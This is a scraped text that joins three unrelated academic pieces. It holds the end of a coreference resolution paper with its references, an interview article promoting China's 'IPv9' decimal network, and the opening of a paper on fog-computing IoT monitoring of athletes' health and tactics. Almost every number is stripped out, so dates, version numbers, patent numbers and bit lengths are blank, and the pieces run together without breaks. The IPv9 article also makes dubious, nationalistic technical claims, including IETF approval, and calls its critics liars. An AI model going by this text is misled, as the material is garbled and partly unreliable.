our representation framework generalizes ap- proaches to coreference resolution which employed specific latent structures for representation, such as latent antecedents (chang et al., ) and an- tecedent trees (fernandes et al., ). we give a unified representation of such approaches and show that seemingly disparate approaches such as the mention pair model also fit in a framework based on latent structures. only few studies systematically compare ap- proaches to coreference resolution. most previous work highlights the improved expressive power of the presented model by a comparison to a men- tion pair baseline (culotta et al., ; denis and baldridge, ; cai and strube, ). rahman and ng ( ) consider a series of mod- els with increasing expressiveness, ranging from a mention pair to a cluster-ranking model. however, they do not develop a unified framework for compar- ing approaches, and their analysis is not qualitative. fernandes et al. ( ) compare variations of an- tecedent tree models, including different loss func- tions and a version with a fixed structure. they only consider antecedent trees and also do not provide a qualitative analysis. kummerfeld and klein ( ) and martschat and strube ( ) present a large- scale qualitative comparison of coreference systems, but they do not investigate the influence of the latent structures the systems operate on. furthermore, the systems in their studies differ in terms of mention extraction and feature sets. conclusions we observed that many approaches to coreference resolution can be uniformly represented by the latent structure they operate on. we devised a framework that accounts for such structures, and showed how we can express the mention pair model, the mention ranking model and antecedent trees in this frame- work. an evaluation of the models on conll- data showed that all models yield competitive results. while antecedent trees give results with the high- est precision, a mention ranking model with latent antecedent performs best, obtaining state-of-the-art results on conll- data. an analysis based on the method of martschat and strube ( ) highlights the strengths of the mention ranking model compared to the mention pair model: it is able to structurally model anaphoricity deter- mination and antecedent competition, which leads to improvements in precision for non-pronominal coreference resolution, and in recall for pronoun res- olution. the effect of latent antecedents is negligible and has a large effect only on very difficult cases of coreference. the flexibility of the framework, toolkit and analysis methods presented in this paper helps re- searchers to devise, analyze and compare represen- tations for coreference resolution. acknowledgments this work has been funded by the klaus tschira foundation, heidelberg, germany. the first au- thor has been supported by a hits phd scholar- ship. we thank the anonymous reviewers and our colleagues benjamin heinzerling, yufang hou and nafise moosavi for feedback on earlier drafts of this paper. furthermore, we are grateful to anders björkelund for helpful comments on cost functions. references mira ariel. . accessing noun phrase antecedents. routledge, london, u.k.; new york, n.y. amit bagga and breck baldwin. . algorithms for scoring coreference chains. in proceedings of the st international conference on language resources and evaluation, granada, spain, – may , pages – . eric bengtson and dan roth. . understanding the value of features for coreference resolution. 
in pro- ceedings of the conference on empirical meth- ods in natural language processing, waikiki, hon- olulu, hawaii, – october , pages – . shane bergsma and dekang lin. . bootstrapping path-based pronoun resolution. in proceedings of the st international conference on computational lin- guistics and th annual meeting of the association for computational linguistics, sydney, australia, – july , pages – . anders björkelund and jonas kuhn. . learning structured perceptrons for coreference resolution with latent antecedents and non-local features. in proceed- ings of the nd annual meeting of the association for computational linguistics (volume : long papers), baltimore, md., – june , pages – . jie cai and michael strube. . end-to-end coref- erence resolution via hypergraph partitioning. in proceedings of the rd international conference on computational linguistics, beijing, china, – au- gust , pages – . kai-wei chang, rajhans samdani, alla rozovskaya, mark sammons, and dan roth. . illinois-coref: the ui system in the conll- shared task. in proceedings of the shared task of the th confer- ence on computational natural language learning, jeju island, korea, – july , pages – . michael collins. . discriminative training meth- ods for hidden markov models: theory and experi- ments with perceptron algorithms. in proceedings of the conference on empirical methods in natural language processing, philadelphia, penn., – july , pages – . koby crammer, ofer dekel, joseph keshet, shai shalev- shwartz, and yoram singer. . online passive- aggressive algorithms. journal of machine learning research, : – . aron culotta, michael wick, and andrew mccallum. . first-order probabilistic models for coreference resolution. in proceedings of human language tech- nologies : the conference of the north american chapter of the association for computational linguis- tics, rochester, n.y., – april , pages – . pascal denis and jason baldridge. . specialized models and ranking for coreference resolution. in pro- ceedings of the conference on empirical meth- ods in natural language processing, waikiki, hon- olulu, hawaii, – october , pages – . greg durrett and dan klein. . easy victories and uphill battles in coreference resolution. in proceed- ings of the conference on empirical methods in natural language processing, seattle, wash., – october , pages – . greg durrett and dan klein. . a joint model for en- tity analysis: coreference, typing, and linking. trans- actions of the association of computational linguis- tics, : – . charles elkan. . the foundations of cost-sensitive learning. in proceedings of the th international joint conference on artificial intelligence, seattle, wash., – august, , pages – . christiane fellbaum, editor. . wordnet: an elec- tronic lexical database. mit press, cambridge, mass. eraldo fernandes, cı́cero dos santos, and ruy milidiú. . latent trees for coreference resolution. compu- tational linguistics, ( ): – . jenny rose finkel and christopher manning. . en- forcing transitivity in coreference resolution. in com- panion volume to the proceedings of the th annual meeting of the association for computational linguis- tics, columbus, ohio, – june , pages – . peter geibel and fritz wysotzk. . perceptron based learning with example dependent and noisy costs. in proceedings of the th international conference on machine learning, washington, d.c., – august , pages – . richard w. hamming. . error detecting and er- ror correcting codes. bell system technical journal, ( ): – . jerry r. hobbs. . 
pronoun resolution. technical report - , dept. of computer science, city college, city university of new york. dan klein and christopher d. manning. . parsing and hypergraphs. in proceedings of the seventh in- ternational workshop on parsing technologies (iwpt- ), - october , beijing, china, pages – . manfred klenner. . enforcing consistency on coref- erence sets. in proceedings of the international con- ference on recent advances in natural language pro- cessing, borovets, bulgaria, – september , pages – . jonathan k. kummerfeld and dan klein. . error- driven analysis of challenges in coreference resolution. in proceedings of the conference on empiri- cal methods in natural language processing, seattle, wash., – october , pages – . shalom lappin and herbert j. leass. . an algo- rithm for pronominal anaphora resolution. computa- tional linguistics, ( ): – . heeyoung lee, angel chang, yves peirsman, nathanael chambers, mihai surdeanu, and dan jurafsky. . deterministic coreference resolution based on entity- centric, precision-ranked rules. computational lin- guistics, ( ): – . adam lopez. . translation as weighted deduction. in proceedings of the th conference of the european chapter of the association for computational linguis- tics, athens, greece, march – april , pages – . xiaoqiang luo. . on coreference resolution per- formance metrics. in proceedings of the human lan- guage technology conference and the confer- ence on empirical methods in natural language pro- cessing, vancouver, b.c., canada, – october , pages – . sebastian martschat and michael strube. . recall error analysis for coreference resolution. in proceed- ings of the conference on empirical methods in natural language processing, doha, qatar, – october , pages – . vincent ng and claire cardie. . improving machine learning approaches to coreference resolution. in pro- ceedings of the th annual meeting of the association for computational linguistics, philadelphia, penn., – july , pages – . eric w. noreen. . computer-intensive methods for testing hypotheses. an introduction. wiley, new york. sameer pradhan, lance ramshaw, mitchell marcus, martha palmer, ralph weischedel, and nianwen xue. . conll- shared task: modeling unre- stricted coreference in ontonotes. in proceedings of the shared task of the th conference on compu- tational natural language learning, portland, oreg., – june , pages – . sameer pradhan, alessandro moschitti, nianwen xue, olga uryupina, and yuchen zhang. . conll- shared task: modeling multilingual unrestricted coreference in ontonotes. in proceedings of the shared task of the th conference on computational natural language learning, jeju island, korea, – july , pages – . sameer pradhan, xiaoqiang luo, marta recasens, ed- uard hovy, vincent ng, and michael strube. . scoring coreference partitions of predicted mentions: a reference implementation. in proceedings of the nd annual meeting of the association for compu- tational linguistics (volume : short papers), balti- more, md., – june , pages – . altaf rahman and vincent ng. . narrowing the modeling gap: a cluster-ranking approach to corefer- ence resolution. journal of artificial intelligence re- search, : – . emili sapena. . a constraint-based hyper- graph partitioning approach to coreference resolution. ph.d. thesis, departament de llenguatges i sistemes informàtics, universitat politècnica de catalunya, barcelona, spain. wee meng soon, hwee tou ng, and daniel chung yong lim. . a machine learning approach to corefer- ence resolution of noun phrases. 
computational lin- guistics, ( ): – . veselin stoyanov and jason eisner. . easy-first coreference resolution. in proceedings of the th in- ternational conference on computational linguistics, mumbai, india, – december , pages – . veselin stoyanov, nathan gilbert, claire cardie, and ellen riloff. . conundrums in noun phrase coref- erence resolution: making sense of the state-of-the- art. in proceedings of the joint conference of the th annual meeting of the association for computational linguistics and the th international joint conference on natural language processing, singapore, – au- gust , pages – . xu sun, takuya matsuzaki, daisuke okanohara, and jun’ichi tsujii. . latent variable perceptron al- gorithm for structured classification. in proceedings of the th international joint conference on artificial intelligence, pasadena, cal., – july , pages – . marc vilain, john burger, john aberdeen, dennis con- nolly, and lynette hirschman. . a model- theoretic coreference scoring scheme. in proceedings of the th message understanding conference (muc- ), pages – , san mateo, cal. morgan kaufmann. xiaofeng yang, jian su, jun lang, chew lim tan, ting liu, and sheng li. . an entity-mention model for coreference resolution with inductive logic pro- gramming. in proceedings of the th annual meeting of the association for computational linguistics: hu- man language technologies, columbus, ohio, – june , pages – . chun-nam john yu and thorsten joachims. . learning structural svms with latent variables. in proceedings of the th international conference on machine learning, montréal, québec, canada, – june , pages – . international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - interview with the inventor of the future network ipv guoshao chen school of computer science and engineering xi'an technological university xi'an, , china e-mail: @qq.com wang yubian department of railway transportation control belarusian state university of transport , kirova street, gomel, , republic of belarus e-mail: alika_wang@mail.ru abstract—with the rapid development of the internet, from the pc terminal to the mobile terminal, from big data systems to intelligent hardware, technology has shown the unique charm of the internet. with the development of the internet, the network information security and network sovereignty issues involved have become increasingly prominent. therefore, only in an environment of security, equality, and mutual assistance can the internet play its due economic and social value. the emergence of a new generation of internet ipv marks a key step for china to move towards an autonomous and controllable future network. ipv is to further safeguard national network sovereignty on the basis of fully guaranteeing network information security. but the defamation of ipv still exists. recently, in order to further clarify the facts, we hereby interviewed xie jianping, the inventor of the decimal network, to conduct an in-depth discussion on the new generation internet ipv . keywords-ipv ; future network; decimal network i. introduction the core of the current internet (also known as the internet) technology is ipv and ipv , and its technical core is completely controlled by the united states. on december , , the us federal communications commission (fcc) officially abolished the net neutrality rule, making the internet with obvious political color and posing a serious threat to internet applications in various countries. 
the address space of the ipv protocol is to the power of . due to the insufficient estimation of the development trend of the internet in the early stage of internet, the insufficient setting of the address space length caused the unreasonable ip allocation. by , there were no addresses to allocate. in theory, ipv has addresses, but only one eighth of the addresses can be assigned to end users, so there are only addresses, which is equivalent to . the bar code in the internet of things is already , which cannot be covered, so ipv also has certain limitations. since the establishment of the decimal network standards working group of the ministry of industry and information technology in august , shanghai decimal network information technology co., ltd. has conducted more than years of research in the future network field, developed a complete network framework system, and completed ipv with independent intellectual property rights. the patent obtained by ipv ( , patent number cn ) has been recognized by many countries including china, the united states, the united kingdom, russia and other countries. this international journal of advanced network, monitoring and controls volume , no. , innovative and internationally strategic new achievement has been vigorously endorsed by the ministry of industry and information technology, the national standards committee and other ministries supported the establishment of a second network system other than the united states. ii. future network ipv in dr zhang's article, ipv is the legal version of the american ietf. the ipv is a version that the united states has publicly declared unsuccessful, but has never abandoned. figure . ipv ev as early as , the united states admitted that ipv address length was inadequate and announced that the old system was behind the times, and began working on ipv , but it was never successful. at present, ipv is being developed in the united states. what is the concept of ipv ? because ipv and ipv are not compatible, ipv solves the problem of communication between ipv and ipv mutual group machine, and the address length should reach bits. the main reasons for the insufficient length of the ipv address are as follows: first, the length of the current bar code ean·ucc on the internet of things is to the th power, while ipv can only achieve to the th power. second, iso has clearly mentioned that the length of the new future network should exceed bits. third, the united states is developing a new network (ipv ) with -bit ip addresses. this is the same as the new ip proposed by huawei, which is unanimously inclined to the viewpoint that the ipv address length is not enough. evidence no. of ipv ev indicates that the statement “ipv is a joke on april fool's day ” disseminated by shenyang, fang zhouzi and a few academicians international journal of advanced network, monitoring and controls volume , no. , and authoritative network experts in china is a lie. ipv is a protocol with an official version number and a specific technical background. the original technical documentation for ipv , tuba, was published by ietf two years before ietf and ietf . ipv is a technology officially approved by the ietf and issued with a version number. ipv is not a closed network, but is connected to the internet in foreign countries. ipv can completely build a pure ipv network, and then connect to the old network through a gateway. 
the relationship between the future network and the internet is like the relationship between the new highway and the old highway, which can operate independently or be interconnected. ipv information can be used in ipv network content circulation, digital domain name is owned by china's own root server, in foreign countries to cut off the network channel and stop the exchange of top-level domain (tld), the use of digital domain users are not affected. in the event of foreign intervention or accident to cut off the overseas access to the internet, china's network can still maintain a safe and stable operation. the ipv address of the future network is basically bits long, and can be expanded to and bits. it can be expressed in simplified decimal or variable length to meet various application scenarios, while ipv address only , , bits version and incompatible. the future network ipv effective address length - bits, can be independently and bidirectionally addressed, and can meet the needs of the internet of things and digital currencies. the address block architecture of ipv restricts its cross-city mobile and bidirectional addressing. it must deduct the -bit network number of each international and operator. the effective url is only bits, which cannot meet the needs of the internet of things mobility and the number of urls. therefore, ipv is a milestone for china to maintain national network sovereignty, guarantee the security of network information, break the monopoly of the us internet, and promote the rapid development of a new generation of internet with independent control and secure interconnection. iii. future network patent china ipv has found a way to implement it, applying for patents and copyright protection. and there are many innovations in the concept of technology, and the development achievements have been remarkable. the main results are as follows: first, the program is complete. china's future network ipv has formed a complete technical solution, including many core technologies, such as naming and addressing technology, three-and-four-layer composite architecture technology, character direct routing technology, terminal analysis technology, compatible interoperability technology and new network security technology. second, it is well equipped. china has developed the key equipment for the future commercial application of network ipv , including root server, core router, parsing server and so on. third, the standard is leading. in the domestic standard, the country has issued a number of technical standards based on decimal network and ipv . internationally, the core technology concept of ipv has been adopted into the international standard, and many technical solutions are about to apply to the international standard for approval. it is shown in figure . international journal of advanced network, monitoring and controls volume , no. , figure . official document of the future network domestic standards for future networks (iso- /ipv ) include: electronic industry standard of the people's republic of china sj/t- - , sj/t- - , sj/t- - , sj/t- - , sb/t- - , sj/t- - . it is shown in figure . future network ipv has obtained patents in china ( inventions, utility models). the method by which the computer assigns the address of the computer by the whole decimal algorithm (patent no.: zl ). a method for the uniform compilation and distribution of addresses of networked computers and intelligent terminals (patent no.: zl ). 
the method of assigning addresses to computers on the internet by using full-digit code (patent no.: zl ). guidance code and its application system for goods and commodity code networking (patent no.: zl x). a networked tax control system and its application method (patent no.: zl ). digital remote video monitoring system device (patent no.: zl ). the future network has also been awarded a us patent. it is shown in figure . international journal of advanced network, monitoring and controls volume , no. , figure . future network china standard content international journal of advanced network, monitoring and controls volume , no. , figure . ipv us patent certificate iv. typical applications of ipv at present, my country has built demonstration projects of ipv address space, root domain name server and ipv backbone optical cable system in beijing, shanghai, shandong, jiangsu and zhejiang, and is building a national military-civilian fusion ipv backbone optical cable and gateway bureau. the ipv network has now completed multi-point testing applications and has obtained good test data. at present, china has established an "n" financial root domain name server which supports bit address space. it has laid a foundation for the unified format of digital currency in china and even the whole world. in the process of issuing digital currency, the root domain name server and the top-level domain name server in the united states can avoid the management control of the overall digital currency issuing network communication system in china. china's digital currency network communication system must have a financial root domain name server parallel to the united states and a "chn" national top-level domain name server and its supporting digital currency electronic vouchers, payment processing and other security service facilities, and adopt advanced advanced authentication before communication technology and supporting domestic encryption technology international journal of advanced network, monitoring and controls volume , no. , completely solve the problem of financial information security, ensure china's financial stability, and safeguard national sovereignty. at the same time, the establishment of a third-party platform for digital currency and physical currency conversion, electronic bills and electronic business path and identity and qualification certification based on the decimal network root domain name server, and unified national prior identification and management. the project of healthy tai 'an ipv big data platform relies on the existing backbone optical cable and user transmission and access network of tai 'an branch of shandong radio and television network co., ltd., and uses ipv network technology for upgrading and reconstruction. the network covers medical and health institutions at city, county, township and village levels as well as tai’an city financial bureau, medical insurance bureau and administrative departments of tai’an. the bandwidth meets the requirements of big data business of tai’an health and sustainable expansion, and the compatible and safe operation of ipv network and ipv network is realized. v. conclusion ipv is a new generation network architecture researched and developed by chinese scholars. it is fully autonomous and controllable, with large address space and safe high-speed large code stream transmission. the distributed analysis of the network has low latency and is compatible with the current internet system. 
future network is a method of empty cup design and new architecture to develop a network system independent of the existing internet to achieve a more secure, more economical, faster and more flexible network. the future network will be developed in years and put into preliminary commercial use around . reference [ ] rfc - internet standard. internet protocol, darpa internet program protocol specification, rfc , . . [ ] s.deering, r. hinden, network working group. internet protocol, version (ipv )-specification, rfc- , . . [ ] m. crawford. network working group. transmission of ipv packets over ethernet networks. rfc- , . . [ ] j. onions, network working group. a historical perspective on the usage of ip version . rfc . . . [ ] v. cerf, network working group. a view from the st century, rfc . . . a novel iot-based health and tactical analysis model with fog computing a novel iot-based health and tactical analysis model with fog computing aykut karakaya and sedat akleylek department of computer technologies, bulent ecevit university, zonguldak, turkey department of computer engineering, ondokuz mayis university, samsun, turkey abstract in sports competitions, depending on the conditions such as excitement, stress, fatigue, etc. during the match, negative situations such as disability or loss of life may occur for players and spectators. therefore, it is extremely important to constantly check their health. in addition, some strategic analyzes are made during the match. according to the results of these analyzes, the technical team affects the course of the match. effects can have positive and sometimes negative results. in this article, fog computing and an internet of things (iot) based architecture are proposed to produce new technical strategies and to avoid disabilities. players and spectators are monitored with sensors such as blood pressure, body temperature, heart rate, location etc. the data obtained from the sensors are processed in the fog layer and the resulting information is sent to the devices of the technical team and club doctors. in the architecture based on fog computing and iot, priority processes are computed with low latency. for this, a task management algorithm based on priority queue and list of fog nodes is modified in the fog layer. authentication and data confidentiality are provided with the federated lightweight authentication of things (flat) method used in the proposed model. in addition, using the software defined network controller based on blockchain technology ensures data integrity. subjects algorithms and analysis of algorithms, computer networks and communications, emerging technologies, security and privacy keywords internet of things, health monitoring, information security, fog computing, tactical analysis, blockchain introduction with the use of technological developments in the fields of health and sports, more efficient methods are obtained than traditional ones. data such as player health, spectator health, and tactical analysis in the match are very important. instantly checking the health status of people on and off the field, and early detection of certain events in tactical analysis make the competition better. for this, applications based on the internet of things (iot) are quite suitable. most iot applications use cloud services for storage and computing. using fog computing improves efficiency for a large-scale iot application involving spectators, players and other actors. 
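as a first intuition for the kind of processing the fog layer performs in the proposed architecture, consider the following minimal python sketch. the sensor types follow the abstract (blood pressure, body temperature, heart rate), but the thresholds, priority levels and function names are illustrative assumptions, not values from the paper.

```python
from dataclasses import dataclass

@dataclass
class Reading:
    person_id: str
    role: str            # "player" or "spectator"
    heart_rate: int      # beats per minute
    body_temp: float     # degrees celsius
    systolic_bp: int     # mmhg

def triage(r: Reading) -> int:
    # 0 = critical (immediate alert), 1 = warning, 2 = routine.
    # thresholds are illustrative placeholders, not clinical values from the paper.
    if r.heart_rate > 190 or r.heart_rate < 35 or r.body_temp > 40.0 or r.systolic_bp > 200:
        return 0
    if r.heart_rate > 160 or r.body_temp > 38.5 or r.systolic_bp > 160:
        return 1
    return 2

def handle(reading: Reading, notify):
    # fog-node logic: compute the priority locally and push only alerts to the
    # devices of the club doctors and the technical team; bulk storage and
    # long-term analytics can be left to the cloud.
    priority = triage(reading)
    if priority < 2:
        notify("priority %d: %s %s" % (priority, reading.role, reading.person_id), reading)
    return priority
```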
since a sports field is within certain limits, the data can be processed on local servers instead of the remote cloud server. this ensures that responses are delivered to the user with low latency because it is important to get quick response to technical team and doctors in terms of early intervention (ikram, alshehri & hussain, ). how to cite this article karakaya a, akleylek s. . a novel iot-based health and tactical analysis model with fog computing. peerj comput. sci. :e doi . /peerj-cs. submitted october accepted november published february corresponding author aykut karakaya, aykut.karakaya@bil.omu.edu.tr academic editor muhammad tariq additional information and declarations can be found on page doi . /peerj-cs. copyright karakaya and akleylek distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:aykut.�karakaya@�bil.�omu.�edu.�tr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ fog computing offers decentralized architecture in cloud computing by expanding storage, computing and network resources to the edge of the network to support large-scale iot applications. cloud and fog provide computing, storage, application, infrastructure and data sources (luan et al., ). there are some important differences between them. the main difference is accessibility and proximity. the fog is close to the nodes in the system and is usually located on the local network. cloud, on the other hand, is the server or data center accessed anywhere on the internet. fog extends the cloud using virtualization to create virtual sensors and networks. in other words, fog works like a layer between nodes and the cloud (mukherjee et al., ). it helps with data analysis, data processing and filtering and increases security for sensitive data. while the cloud is more central, the fog works more efficiently in distributed applications. important points in terms of tactical analysis in sports: determining the most appropriate rust analysis, helping coaches in replacement, taking measures against problems that may arise when the tactical order is broken, etc. important point in terms of health is determining the negative health conditions of players and spectators during the match, such as disability. there are studies in the literature for tactical analysis. with voronoi graph and delaunay triangulation, possible pass combinations and analysis of quality pass conditions were created (horton et al., ). detailed data such as how fast, strong, smart for a player was collected and could be analyzed during the match (burn-murdoch, ). some well-known methods are: the shading method that predicts the most probable moves of the players against certain events, the dominant regions method that enables determining the regions where a player can arrive earlier than other players using the voronoi graph (taki & hasegawa, ). related work in a study conducted as a feedback system in sports, data were expanded to examine exercise practices (baca & kornfeind, ). trials were made in table tennis, biathlon and rowing sports. in table tennis, the system detects the effects of the ball on the table in order to determine the accuracy of the shot. in the biathlon, the position of the rifle barrel before and after the shot was analyzed with a laser positioning system. 
in rowing, the system has been calculated the effort made for rowing. in this study, the system is not flexible, as it depends on sports. in another study, the health status of marathon runners was monitored with a wsn (pfisterer et al., ). data was collected with sensors in runners and analyzed offline in a database. systems that provide video feedback for athletes could also compare athletes (vales-alonso et al., ). however, these studies are not real time. in real-time studies, the perceived data with a wsn monitoring cyclists were compared with predefined datasets and provides feedback to the group of cyclists. the system could tell the cycling group to change their order, divide or increase their speed. environmental data are not taken into consideration in this study. however, environmental factors such as wind speed, temperature and humidity can also affect this situation. in a dynamic study dealing with environmental factors, spline-based numerical karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ approach techniques were recommended as a decision making method (vales-alonso et al., ). besides the physical conditions of the athlete, the conditions of the land were also handled and the athlete was guided. the spline approach has been used because some structures such as support vector machine (svm) previously required a lot of data. in this way, multivariate problems could be solved. however, this study has been suggested for training situations in sports such as running and cycling. this method is used for health monitoring and determining the direction of the athlete. the proposed model, besides monitoring the health of players in football, helps the technical team by performing tactical analysis during the match. in kubler et al. ( ), it was shown that the emergency situations obtained from the data in the stadium were transmitted to the health institutions in smart city planning. similarly, it was mentioned that structures that are safe and can detect attacks can be developed. it was emphasized to offer a better sporting event in the world cup. kubler et al. ( ) presents a framework that enables iot service stakeholders to freely join, contribute, and benefit from an open iot ecosystem. in naha et al. ( ), it was mentioned that fog computing based structures will be used a lot in the future and real time application architectures should be developed. it was emphasized that security mechanisms are also very important in the proposed models. in addition, resource allocation is a critical issue in distributed resources such as fog. it was explained that the simultaneous processes should be planned appropriately in the fog layer. in habibi et al. ( ), it was emphasized that architectural design, algorithms and technologies are the top three research subjects. each of these three aspects can be applied in a number of subject areas that are divided into six major categories: computing paradigm, application, software, networking, computing resource management and security. in niu et al. ( ), a task assignment algorithm was proposed for edge calculation. it was emphasized that complexity is difficult to calculate in heuristic approaches, so these approaches should be developed. in iqbal et al. ( ), a task offloading algorithm was proposed. it was explained that the proposed framework can be improved by adding verification mechanisms with blockchain structures. in wazid et al. 
( ), the importance of using blockchain-based cloud or fog for a safe health system was emphasized. there are also health monitoring studies applied in hospitals, sports fields or other fields. in ikram, alshehri & hussain ( ), the system that detects conditions such as disability of players and sends them to the coach was recommended. machine to machine (m m) standard was used in this system. also, there were three layers: the detection layer consisting of wireless body area networks (wban), the network layer using zigbee technology and the cloud layer using cloud services to control all data. another health monitoring system that uses fog computing was recommended for hospitals in paul et al. ( ). in this model, data detected using wireless sensor network (wsn) and wban were transmitted to the fog layer. in the fog layer, the data was prioritized and the tasks are distributed appropriately to the fog nodes. thus, more important transactions were given priority. fog computing has some security advantages. however, security operations between the fog and the cloud were provided using the key pair. it was emphasized that the model is partially implemented due to obstacles such as non-existent karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ software and complexity of existing software (paul et al., ). in soni, pal & islam ( ), a three-factor mutual authentication scheme was proposed in wsns for the security of health systems. it provided mutual authentication between a user and the sensor node that is a trusted authority. software defined network (sdn) and network function virtualization (nfv) based structures were used to establish, secure, scale, increase efficiency and reduce the cost of the fog network (krishnan, duttagupta & achuthan, ). sdn covered software-based technologies, models and protocols that make the global network smarter, more abstract and functional. nfv included high-volume structures developed to virtualize network functions and increase network integration. the task of the fog network was to connect each component of the fog layer. it was difficult to manage these networks and achieve sustainable connectivity. sdn and nfv techniques were used for operations that increase the efficiency of the system such as easy management and scalability (yi, li & li, ). each fog node could communicate multi-hop (node-to-node). therefore, each node served as a router in the fog network. sdn was used for efficient routing optimization in the fog platform. hierarchical sdn-based fog architecture studies were carried out on the iot platform in order to enable effective routing of fog nodes (okay & ozdemir, ). nfv separated software from hardware with virtualization to make network functions faster. nfv-based hybrid (cloud and fog) systems were developed to minimize the cost of the network (mouradian et al., ). in madsen et al. ( ), important measurements were made for the service quality of the fog network. these were connectivity, reliability, capacity and latency measurements. the network was expected to be fast and reliable in connectivity measurement. in reliability measurement, it was expected that the data will be transmitted accurately and completely. however, for this, some control operations were applied to the data. this brought additional costs to the system as a delay. in capacity measurement, the network was expected to use bandwidth and storage areas efficiently. 
therefore, the data was collected, then the computing was made. thus, the cache could be redesigned for other processes (wang et al., ). this process caused delay. in the delay measurement, the nodes were expected to receive a rapid response from the computing and storage processes. with the techniques such as flow mining and complex event processing, delays could be reduced by predicting future operations. interface and programing models were required for iot developers to move their applications to the fog computing platform. dynamic, hierarchical resources were needed to optimize based on these models for components to adapt to these platforms (yi, li & li, ). end nodes could be mobile in iot applications. mobile end nodes created challenges in resource management because bandwidth, storage, computing, delay situations change dynamically. resource management and sharing studies were carried out that properly share heterogeneous resources such as cpu, bandwidth, storage, in the fog layer (liu et al., ). the task scheduling model was recommended for iot applications in the cloud (basu et al., ). a hybrid system has been designed by using the genetic algorithm and the ant colony algorithm together. it was emphasized that the performance increased depending on the karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ number of processors. it was aimed to reduce the processing time of the tasks in the processors rather than the assignment of the tasks to the processors. in kuang et al. ( ), a two-level alternation method framework based on lagrangian dual decomposition was proposed at the lower and upper levels to solve the problems of offloading and resource allocation in mec systems. in zhu et al. ( ), a deadline sensitive mec system with mobile devices sharing multiple heterogeneous mec servers and formulating a minimum energy consumption problem was proposed. in alameddine et al. ( ), a new thoughtful decomposition based on the logic based benders decomposition technique was designed for the resource allocation problem. in rahbari & nickray ( ), the importance of resource allocation and task scheduling in fog-based applications was emphasized. a greedy knapsack-based scheduling algorithm has been proposed to properly allocate resources to modules in the fog network. algorithm simulated with ifogsim. in heydari, rahbari & nickray ( ), it was mentioned that resource management is an np-hard problem to reduce energy consumption in the cloud. fog scheduling structures using the bayesian classification scheduling method were examined. the method was simulated using the ifogsim program and was said to reduce energy consumption and costs in the cloud. in fang et al. ( ), time sharing optimization of communication and computing resources was discussed in order to minimize the total energy consumption of mobile devices in a mobile edge computing (mec) system.an algorithm based on the alternating direction method of multipliers was proposed for energy consumption in mec systems. it was emphasized that these models are simulated and their performance is high. motivation and contribution in this article, secure iot model is proposed to monitor the health of players and spectators, and tactical analysis in the match. in the proposed model, the system becomes more efficient with the help of fog computing. 
in addition to some security situations of fog computing, there are important features to be achieved such as privacy, confidentiality, authentication, detection of attacks and bandwidth saving, which makes the system safe and fast. thus, their health is monitored by protecting the privacy of players and spectators from third parties. in tactical analysis, two teams are isolated from each other by authentication methods. in the transmission of both requests/ responses sent to end devices, fog computing is faster than cloud computing. also, important processes are processed faster and the delay is effectively reduced with the priority based queue method in fog nodes. thus, the requests with high priority are processed with low latency. in processes that require high processing capacity such as authentication and privacy in the proposed system, bandwidth is saved thanks to implicit certificates. malicious changes are noticed with block chain based sdn controller. data loss is prevented and data integrity is ensured during flooding attack. data stored permanently is encrypted when it is sent from the fog nodes to the cloud. in this article, security problems faced by fog computing systems are also discussed. the measures of our model against these problems are explained. there is also an analysis of our model in terms of safety and effectiveness. karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the difference from the similar work in ikram, alshehri & hussain ( ) and soni, pal & islam ( ) is that the fog model is used in the proposed model. thus, responses with low latency are produced. a task management algorithm different from the work in paul et al. ( ) is proposed in fog nodes. in the proposed model based on priority queue and node list, it is aimed to make priority processes with low latency. also, another difference of the proposed model from these studies is the processing of tactical analysis cases as well as the health system. in horton et al. ( ) and taki & hasegawa ( ) included tactical analysis approaches or reviews. no studies on health systems have been conducted. in baca & kornfeind ( ) and pfisterer et al. ( ) were non real time models. in these studies, fog computing was not used and task management mechanism was not recommended. there is no detailed security proof. the proposed model is real-time and includes blockchain-based and lightweight plugins for security principles such as authentication, privacy, integrity. analysis of the model is also included in this article. in addition, in the proposed model, light protocols are used for communication and security. and so the processing load on low power devices is reduced. organization in this article, fog computing and iot based lightweight and safe model are recommended for tactical analysis and health monitoring in sports. in addition, research is made on the features and security principles of the fog computing platform. the following sections of the article include: features and security needs of fog computing in “proposed model”, the details of the proposed model in “analysis of the proposed model”, the security and effectiveness analysis of the proposed model in “simulation of the proposed model”, challenges of wearable technology studies and suggestions for future studies in “challenges in wearable technologies and future works” and conclusion in the last section. 
fog computing features and security needs this section contains features and security needs of fog computing. it includes the security concept of fog computing and iot protocols used in the proposed model. fog computing is a localized and virtualized platform that provides services such as data processing and storage between end devices and cloud data centers (bonomi et al., ). iot becomes more efficient and more secure with fog computing (abdulkareem et al., ). sensors with restricted resources are used in the iot applications. processes that require large computing such as data processing, storage, and encryption are not usually done by sensors. therefore, there must be a structure that performs these processes. generally, cloud nodes serving as remote servers or fog nodes serving locally are used. fog computing is used to process, store and protect data from sensors without being sent to the cloud. the unsecured internet network is used when sending data to the cloud. if iot devices send the detected data to the cloud, it carries risks such as stealing and modifying the data. in addition, it takes a lot of time to process and store the data. the delay time increases for the response to end devices. since data is processed locally when using fog computing, latency is reduced for response to end devices. also, if the data karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ needs to be sent to the cloud, the data is protected with encryption. it is important to use fog computing in iot applications to increase the performance of the system. a large amount of data is obtained in iot applications. to transfer the data to the cloud, it requires high bandwidth. therefore, analyzing the data in the fog layer and sending only the data to be stored permanently to the cloud reduces the bandwidth (cisco, ). three-layer architecture is commonly used for fog computing. the first layer consists of end devices such as sensor nodes, smart devices, iot supported devices. the second layer consists of fog nodes such as router, gateway, switch, access points. the fog nodes carry out storage and information processing activities. the third layer 